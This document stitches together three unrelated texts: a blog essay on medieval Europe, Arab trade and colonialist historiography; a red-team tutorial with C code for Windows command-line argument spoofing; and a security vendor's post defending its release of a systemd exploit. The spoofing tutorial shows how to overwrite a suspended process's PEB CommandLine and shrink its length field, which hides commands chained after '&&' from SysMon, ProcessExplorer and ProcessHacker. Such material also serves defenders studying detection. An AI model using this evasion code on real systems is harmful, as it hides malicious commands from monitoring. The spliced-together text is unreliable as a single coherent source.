nope

An idea that well-meaning people with no background in medieval history often bring up to me when attempting to relate is that the medieval period was certainly a glowing time for civilization – if one is explicitly and only discussing the Arab world. This idea gets hurled at me when I am pointing out what the term Dark Ages means, or discussing the bathing habits of medieval Europeans, or just trying to have a quiet pint in peace for the love of Christ. As I say, I do think it comes from a place of wanting to correct an inaccurate and overly European historiography. People want to prove that they understand there is more to the world than one peninsula and that multiple histories are available. They want to show that they understand that non-White people are capable of innovation. They also want to show that they have learned something and are able to critique dominant historical narratives. While all of this is all very charming, it is also inaccurate, and ironically ideas like this – far from elevating Arab history – simply play into a colonialist narrative in history, but from another angle.

As regular leaders of the blog will no doubt be aware I regularly stan medieval Arabic culture. If you asked me where I would live in the medieval period I always say the Iberian peninsula where I (as a noted lady) would have a better chance at determining my own career and indeed just partying. I have written repeatedly on the racism of ignoring Arabic luminaries like Ibu Sinna, and have attempted to highlight the interconnected nature of the medieval world and the ways in which trade, both commercial and intellectual, enlivened medieval Europe. All of this is to say that I am more than aware of the fact that there was a whole hell of a lot of interesting stuff going down in the medieval Arabic world. So, I agree with statements like these to a certain point. The trouble that I have has to do with the idea of Europe as a hopeless backwater in opposition to the glories of the Arab world.

Obviously one of the major reasons I disagree with this position is that it is just flat out wrong. I should hardly need to say by now that the idea that there is an intellectual downturn in early medieval Europe (or indeed medieval Europe more broadly) is a part of a specific imperial colonialist historiography which seeks to argue that any point when Europe wasn’t violently subjugating the world around it was necessarily a bad time. To this way of thinking, when the Roman Empire goes around turning everyone into slaves and violently opposing anyone it can get its hands-on things are good, because also some amphorae are traded across the Mediterranean; but when there isn’t one giant state oppressing everyone things are bad because fewer amphorae. This is obviously a stupid and racist position which presumes that the nice things which rich Romans enjoyed (slaves and hegemony) were available to everyone, and also requires us to just ignore the fact that slaves are people. Rome wasn’t a very nice time for the great majority of individuals, and the medieval period had plenty of nice things for the average person – you just got fooled by a later medieval advertising campaign for art and a bunch of people who wanted to do slavery in the modern period.

Accepting the idea that Europe did suck in the medieval period is automatically ascribing to this racist and imperialist version of history. In order for a society to be good and have worthwhile things it doesn’t need to be constantly attacking other cultures and enslaving people. Look inside yourself if you think that is true.

Another reason why this falls down as an argument is also that the whole “Europe as an isolated not trading enemy in opposition to the Arab world which had nice things and was gloriously well-connected” thing is not how things happened. If, for example, we look at trade routes in the earlier medieval period as a starting point we see that is in no way the case. We do see a drop off in international shipping when the Roman Empire collapses. This is because the Empire itself used to ship goods along with moving troops in its fleets of tax-funded vessels. This existed alongside independent trading, which also moved stuff like olive oil from the Iberian peninsula or amphorae out of what is now Tunisia. Once there is no longer a state propped up by taxation doing shipping itself, shipping across the Mediterranean also slumps. That does not mean that it stops.

While we see a decline in movement, the key here is that we see a decline, not a total cessation. Movement very much continued throughout the early medieval period, and we have ample pot-shard based evidence to back that up. Yes certainly many people shifted to making their own potery, but rich people could still get their hands on the good stuff if they wanted to.

You know when European shipping in the Mediterranean really slowed down? After the Muslim conquests. Where there had been a lively shipping economy suddenly there were a bunch of real bad ass guys who had carte blanche to intercept the ship of any infidel they could find. Oh and if you could take some of their land while you were at it, that would be great. All of this was made possible famously, the Umayyad conquest of Hispania went really well, felling the Visigothic kingdom on the Iberian Peninsula and turning all those olive orchards over to Muslim rule. In quick succession,  you then see the establishment of the Emirate of Ifriqiya on the North-African coast, as well as the Emirate of Sicily on, well, Sicily. In other words, a lot of the Western Mediterranean just wasn’t Christian any longer, so it’s kinda weird to blame Europeans for not maintaining trade routes there. You can’t simultaneously demand that Europeans trade more with the Muslim world while ignoring the fact that the Muslim world was also a part of Europe, and very much interested in dominating any extant trade routes.[1]

This narrative also completely ignores the fact that there was thriving trade which existed all through this period.[2] We have plenty of records on port tolls and taxes which tell the story of luxury goods crisscrossing the continent and across the Mediterranean, regardless of who was doing what.[3] Walrus ivory and amber from the Baltic coast ends up at the Eastern Roman court in Constantinople. Furs, honey, and elephant ivory popped up basically anywhere anyone had the gold to trade for it. Oh and gold, which largely came from Africa, was around the shop too. Indonesian spices like pepper and nutmeg featured happily in European cuisines, and lapis lazuli from Afghanistan was being ground into ultramarine. You want luxury goods? They were there, because trade was still happening. It just wasn’t happening on an imperial scale – an undertaking which I will again remind you takes a whole lot of slaves to maintain. The idea that Europeans were an unwashed and unrefined mass in opposition to the glories of life in the Arabic world just doesn’t hold up to scrutiny.

The backward post-Roman Europe versus glories of the East narrative also very helpfully ignores the fact that one of the glories of the East was the still extant Eastern Rome – with its afore-mentioned capital in Constantinople. (You may also know it as Byzantium, but we are trying to be precise here.) Of course, Eastern Rome was one of the big losers in the whole Muslim conquests thing, losing its extremely valuable territory in Egypt, which accounted for a huge amount of its tax revenue. It also very famously lost the near east more generally. Having said all that, it was still a major maritime power, owning territory on the Italian Peninsula in what is now Calabria and Apulia. Constantinople was still very much about that Roman life in the medieval period, with a keen popular interest in Chariot racing, a lively trade with the near East and Western Christendom, and even what could be seen as a sort of pre-modern welfare state, ensuring that its citizens in cities always had enough grain to eat. If we want to pretend that everything was bad and gloomy in medieval Europe compared to the Arab world because Rome collapsed, how then do we account for the fact that it was actually still going at that time, and trading just fine?

Obviously then, narratives of trade stopping totally in medieval Europe are incorrect and overwrought, but why would I say that buying into them supports a colonialist narrative? The answer to that is saying that Europe didn’t have anything nice, as opposed to a flourishing Arab world is a way of justifying the violent incursions on the part of Europeans into the Middle East.

These arguments usually hinge on the idea that before the Crusades, Europe was a disgusting place full of people who didn’t bathe and nothing but unsalted porridge to eat. All of that changes, in theory, with increased contact to the Middle East with the establishment of the Crusader States in the middle east. The theory goes that it wasn’t until Europeans were able to carve their own ports out along the coast of the Levant that anything nice got into Europe at all. Without Europeans at Jaffa, there would be no spices, oranges, or rice in Europe. Hell, without all that religious violence maybe Europeans never would have anything nice ever!

That is not only factually incorrect, but it is a way of justifying what amounted to centuries of attempts to violently subjugate the Holy Land. Sure, all that violence was unseemly – but access to the Silk Road! It also amounts to a convenient justification for modern imperial and colonial violence. Well Europe was a terrible hell hole! What choice did they have other than to sail around the globe, enslave huge swathes of people, do a spot of genocide and begin to extract all possible value from any native people! After all, everything they had before they started in on the colonising in earnest was bad.

None of this is either historically correct, or acceptable.

We can, and should, point out the major advancements that Mulsim society presented to the world. There is absolutely no doubt that there was a tonne of interesting stuff going on in the near East, and I in no way dispute that assertion. What is incorrect is the idea that medieval Europe was cut off from that brilliance, a backward hole where there was no trade, no spices, no intellectual culture. Europe and South Western Asia have always been connected, and indeed the term “Arabic World” very much includes huge swathes of Europe at various points during the medieval period. If you want to say medieval Europe is a sad foil to the Muslim kingdoms, how do you account for the several European Caliphates? If you want to say that without the Roman Empire Europe lost everything bright and worthwhile, how do you explain the still up and running Eastern Roman Empire? If you want to say that without post-Crusades trade there never would have been meaningful trade in Europe how do you explain all the fucking trading?

The desire that many have to defend the medieval Arab world and its culture in the medieval period is laudable. I in no way am here to argue that it had a lot of good stuff going on. However, pretending that all of this had nothing to do with the European world and trade, or that the only place where intellectual advancement was happening was the Arab world is simply incorrect. The medieval world was complex, interconnected, and very much a part of an on-going scholastic tradition. To argue that without violent force Europe would have languished as a dull afterthought it to argue for imperial colonialism. Medieval Europe was a vibrant and well-connected place, and it could have continued to be so without all of the slavery and genocide. Europeans didn’t need to rape and pillage their way through the world to learn and grow. They just did it because they could.

Pro-imperialist historiography is the air that we breath here in the decaying carcasses of the modern Imperium. I am extremely sympathetic to the urge to celebrate non-white cultures, and I spend quite a lot of time doing so myself. However, to argue that this was happening without any contact with Europe, and that Europeans cannot think or enjoy luxuries without also being involved in a violent imperial enterprise is extremely dangerous. I know that the people who make this argument think they are being enlightened, but they are still making a pro-imperial argument when they trot out tired myths about the medieval period. We don’t undo the colonial historiography by agreeing with it. We need to write our own history which admits that every world culture has something useful and beautiful to offer us all, and that a better world can be achieved without the subjugation of others.

---

---

[1] This is a massive simplification of a fascinating subject, and trade continued notwithstanding. See D. Valérian, “The Medieval Mediterranean”, in P. Horden and S, Kinoshita (eds.), A Companion to Mediterranean History, https://doi.org/10.1002/9781118519356.ch5
[2] On post Roman trade see, Michael G. Fulford, “Byzantium and Britain: a Mediterranean perspective on Post-Roman Mediterranean Imports in Western Britain and Ireland”, Medieval Archaeology, 33:1 (1989), 1-6.
[3] See, for example, N. Middleton, “Early medieval port customs, tolls and controls on foreign trade”, Early Medieval Europe, 13 (2005), 313-358.

---

If you enjoyed this, please consider contributing to my patreon. If not, that is chill too!

---

For more on medieval Islamic advancements culture, see:
Islam was the party religion, or, why it is lazy and essentialist to say that Islam oppresses women
On Medical Milestones, Being Racist, and Textbooks, Part I
On Medical Milestones, The Myth of Progress and Being Racist, Part II

For more on myths about the medieval period, see:
Plague Police roundup, or, I am tired, and you people give me no peace
How to win friends and influence people in medieval Europe on History Hit
If you are going to talk about the Dark Ages, you had better be right
JFC, calm down about the medieval Church
On Medical Milestones, Being Racist, and Textbooks, Part I
On Medical Milestones, The Myth of Progress and Being Racist, Part II
On medieval healthcare and American barbarism
I assure you, medieval people bathed.
On colonialism, imperialism, and ignoring medieval history
“I wasn’t taught medieval history so it is not important” is not a real argument, but ok
There’s no such thing as the ‘Dark Ages’, but OK
On the Concept of the Renaissance and Outkast’s Hey Ya
FUCK YEAH Genghis Khan – an emergency pubcast
On why the misuse of the word ‘medieval’ is a bad thing

In Cobalt Strike 3.13, the argue command was introduced as a way of taking advantage of argument spoofing. I was first made aware of the concept while watching Will Burgess's awesome talk RedTeaming in the EDR Age, with Will crediting Casey Smith who presented the idea during a series of tweets.

As with anything introduced to Cobalt Strike which has the chance to improve operational security, I wanted to dig into the concept further to see just how this technique worked under the hood, and to understand just how we can leverage this in other tools developed outside of Cobalt Strike.

To start our review of how argument spoofing works, let's take a look at a popular tool provides information on executing processes including their arguments, ProcessHacker.

ProcessHacker Argument Display

As you will likely know, ProcessHacker is an open source tool similar to SysInternals Process Explorer, which is used by administrators and investigators to analyse running processes on Windows.

The source code to the application is available on GitHub, and after a bit of grepping, I found the code responsible for retrieving process arguments within phlib/native.c. The code looks like this:

NTSTATUS PhGetProcessPebString(
    _In_ HANDLE ProcessHandle,
    _In_ PH_PEB_OFFSET Offset,
    _Out_ PPH_STRING *String
    )
{
    ...
        PROCESS_BASIC_INFORMATION basicInfo;
        PVOID processParameters;
        UNICODE_STRING unicodeString;

        // Get the PEB address.
        if (!NT_SUCCESS(status = PhGetProcessBasicInformation(ProcessHandle, &basicInfo)))
            return status;

        // Read the address of the process parameters.
        if (!NT_SUCCESS(status = NtReadVirtualMemory(
            ProcessHandle,
            PTR_ADD_OFFSET(basicInfo.PebBaseAddress, FIELD_OFFSET(PEB, ProcessParameters)),
            &processParameters,
            sizeof(PVOID),
            NULL
            )))
            return status;
            
        // Read the string structure.
        if (!NT_SUCCESS(status = NtReadVirtualMemory(
            ProcessHandle,
            PTR_ADD_OFFSET(processParameters, offset),
            &unicodeString,
            sizeof(UNICODE_STRING),
            NULL
            )))
            return status;
            
    ...
}

Here we see a number of Win32 API calls, the first one (wrapped within PhGetProcessBasicInformation) is NtQueryInformationProcess which is passed a parameter of ProcessBasicInformation. If we review the API documentation, we see that this parameter requests the PEB (Process Environment Block) from a target process.

Once ProcessHacker has the PEB of the process, it then becomes trivial for it to enumerate the arguments used, for example, let's take a look at what makes up the Process Environment Block struct:

typedef struct _PEB {
  BYTE                          Reserved1[2];
  BYTE                          BeingDebugged;
  BYTE                          Reserved2[1];
  PVOID                         Reserved3[2];
  PPEB_LDR_DATA                 Ldr;
  PRTL_USER_PROCESS_PARAMETERS  ProcessParameters;
  PVOID                         Reserved4[3];
  PVOID                         AtlThunkSListPtr;
  PVOID                         Reserved5;
  ULONG                         Reserved6;
  PVOID                         Reserved7;
  ULONG                         Reserved8;
  ULONG                         AtlThunkSListPtr32;
  PVOID                         Reserved9[45];
  BYTE                          Reserved10[96];
  PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;
  BYTE                          Reserved11[128];
  PVOID                         Reserved12[1];
  ULONG                         SessionId;
} PEB, *PPEB;

For the purposes of this post we will focus on the ProcessParameters field, which is made up of:

typedef struct _RTL_USER_PROCESS_PARAMETERS {
  BYTE           Reserved1[16];
  PVOID          Reserved2[10];
  UNICODE_STRING ImagePathName;
  UNICODE_STRING CommandLine;
} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;

And it is here that the processes command line is exposed, revealing arguments used during the creation of the process. So now we know where to find this, how can we go about updating this with the aim of spoofing arguments?

Updating PEB CommandLine

To begin, let's spawn a process as you normally would, however we will first suspend its execution using the CREATE_SUSPENDED flag:

CreateProcessA(
    NULL,
    "cmd.exe", 
    NULL, 
    NULL, 
    FALSE, 
    CREATE_SUSPENDED, 
    NULL, 
    "C:\\Windows\\System32\\", 
    &si, 
    &pi);

With the process spawned and in a suspended state, we now need to grab the PEB address, which can be done using the same trick as ProcessHacker, via the NtQueryInformationProcess call. As this call isn't exposed via the usual libraries, we will need to find it dynamically at runtime:

typedef NTSTATUS (*NtQueryInformationProcess)(
	IN HANDLE,
	IN PROCESSINFOCLASS,
	OUT PVOID,
	IN ULONG,
	OUT PULONG
);

PROCESS_BASIC_INFORMATION pbi;
DWORD retLen;
SIZE_T bytesRead;
NtQueryInformationProcess ntpi;

ntpi = (NtQueryInformationProcess)GetProcAddress(
    LoadLibraryA("ntdll.dll"), 
    "NtQueryInformationProcess");

ntpi(
    pi.hProcess, 
    ProcessBasicInformation, 
    &pbi, 
    sizeof(pbi), 
    &retLen);

With the address of the PEB identified, we can now extract a copy from the running process using ReadProcessMemory:

void* readProcessMemory(HANDLE process, void *address, DWORD bytes) {
	SIZE_T bytesRead;
	char *alloc;

	alloc = (char *)malloc(bytes);
	if (alloc == NULL) {
		return NULL;
	}

	if (ReadProcessMemory(process, address, alloc, bytes, &bytesRead) == 0) {
		free(alloc);
		return NULL;
	}

	return alloc;
}

...

// Read the PEB from the target process
success = ReadProcessMemory(pi.hProcess, pbi.PebBaseAddress, &pebLocal, sizeof(PEB), &bytesRead);

Now we need a copy of the ProcessParameters field which is an instance of the RTL_USER_PROCESS_PARAMETERS struct:

// Grab the ProcessParameters from PEB
parameters = (RTL_USER_PROCESS_PARAMETERS*)readProcessMemory(
	pi.hProcess, 
	pebLocal.ProcessParameters, 
	sizeof(RTL_USER_PROCESS_PARAMETERS)
);

Contained within the RTL_USER_PROCESS_PARAMETERS struct is the CommandLine field we are looking for, which is actually an instance of a UNICODE_STRING struct. This means that we can update the arguments by writing to the UNICODE_STRING.Buffer address using WriteProcessMemory:

// Set the actual arguments we are looking to use
success = writeProcessMemory(
    pi.hProcess, 
    parameters->CommandLine.Buffer, 
    (void*)L"cmd.exe /k dir\0", 
    30);

And finally, we resume execution with ResumeExecution. Once the thread is resumed, we find that our process will execute and parse our injected arguments as though they were passed during the CreateProcess call.

Argument Spoofing Impact

Now we have a way to update command line arguments at runtime, what impact does this have on tools recording execution activity? Well first let's look at SysMon. Here we can see the results after spoofing our arguments with a simple "cmd.exe /k echo Argument Spoofing Test":

Next let's take a look at ProcessExplorer:

One interesting thing called out during Raffael's introduction to "Argue" (available here if you haven't see it) is that tools like ProcessExplorer actually retrieve a copy of the PEB each time the process is inspected, meaning that our spoofed arguments are revealed.

Spoofing Arguments to Process(Explorer|Hacker)

This was bugging me a bit, as there must be a way to avoid ProcessExplorer and similar tools if we have control over the PEB. It turns out that there is a weird trick that does work with both ProcessHacker and ProcessExplorer and allows you to hide your arguments... by simply creating a corrupted UNICODE_STRING.

As we know, the CommandLine argument of _RTL_USER_PROCESS_PARAMETERS is a pointer to a UNICODE_STRING structure. This has the following layout:

typedef struct _UNICODE_STRING {
  USHORT Length;
  USHORT MaximumLength;
  PWSTR  Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

We know that when we copy our true arguments to the Buffer parameter address, the application uses this when attempting to parse parameters, but what happens if we set the Length parameter to be less than the size of the string set within the Buffer?

Well what we find is that for ProcessHacker and ProcessExplorer, each will terminate the string displayed after Length bytes, whereas the actual process will continue to use Buffer until it hits a NULL character. For example, here we have a process running with the command line cmd.exe /k echo Argument Spoofing. If we update the Length of the CommandLine field to 14, we see that ProcessExplorer is showing only cmd.exe as the command line argument:

Similar with ProcessHacker, we are clearly running cmd.exe with an argument, but due to the undersized Length field, the remainder of the command line is hidden:

Obviously this allows us to have a bit of fun, adding parameters such as echo Something && [Hidden command] which will be truncated, hiding our true intentions:

I've not yet tested this across multiple applications, but it seems that both cmd.exe and powershell.exe have this same behaviour. If you know why this inconsistency exists, please let me know.

The source code for performing argument spoofing can be found below, or on Github here.

Last week, Capsule8 Labs released an exploit for the problems in systemd that Qualys identified on January 9th, as part of series analyzing the vulnerabilities CVE-2018-16865 and CVE-2018-16866. We were asked why we would “weaponize” the exploits and if it would arm those looking to do harm.  We have decided to expand on our reasoning, as it’s core to a lot of what we do here at Capsule8.

Today’s “responsible” disclosure practices do harm to end customers. Disclosure’s primary place is to be a tool to ensure vendors behave responsibly to problems in their code. It’s understandable that people want to use it to market themselves and their companies, and that’s okay too, but if vendors are behaving responsibly, then people need to be patient.

As long as vendors are acting responsibly and taking reasonable actions to fix their issues, everyone should refrain from disclosure until patches are available. The goal of the security industry should be to protect people and data, and premature disclosure in the face of a responsible vendor puts those things at risk.

Eventual disclosure is important so that people continually are reminded of the problem and the need to keep up to date with patches.  But the industry should give users a reasonable time to patch before disclosure, instead of trying to maximize the marketing impact by talking about the bug at the same time as a patch.  While 30 days is a reasonable amount of time in between upgrades, 30 seconds is not.

But whenever disclosure happens, it is incredibly important to have access to a working exploit. This systemd bug is a perfect example. Even though Qualys did not provide an exploit (citing the fact that, at the time, there was not yet a patch), it’s fairly easy for anyone with the right level of skill set to take the information they gave and produce a working exploit. Once the information is out there, the lack of an exploit is not going to be a significant hurdle for talented threat actors, who have good economic motivation to create their own exploit.

However, not having the exploit makes life harder on defenders. At Capsule8 we test our products against relevant exploits, as it helps us make sure our customers are likely to be protected against similar exploits. If this reveals any gaps, it pushes us to jump on them quickly. If we can’t test, we have to make a tough call on priorities and whether to build our own exploit to do our own testing. We hope other security vendors do the same.

End-users should be able to do the same. Defenders should have easy access to exploits in the same way attackers do, if only to test the products they use and the controls they have in place.

In short, disclosing without releasing an exploit doesn’t provide a significant speed bump to the hackers who matter (only the script kiddies). It just makes the defender’s life much harder.

So far, we have hedged our bets a bit– we have only released an exploit that requires ASLR to be turned off (even though there’s no issue landing with the bypass). Most production Linux systems will have ASLR turned on, so the exploit won’t land. This should be a high enough bar for the kiddies, but not the smart, motivated threat actor (this doesn’t concern us since the bar wasn’t unobtainable for that kind of actor anyway). But the exploit is still enough for defenders to do the testing they need to do to be able to provide some assurance to their end users.

Still, it means we haven’t “weaponized” anything, but we’ve equipped people with some ability to measure their exploit detection mechanisms.  Whether or not vulnerability researchers move towards giving longer windows for patching before disclosure, they should at least try to always provide an exploit that works well enough for the industry to test against.

The post Capsule8’s Stance on Publication and Vulnerability Disclosure appeared first on Capsule8.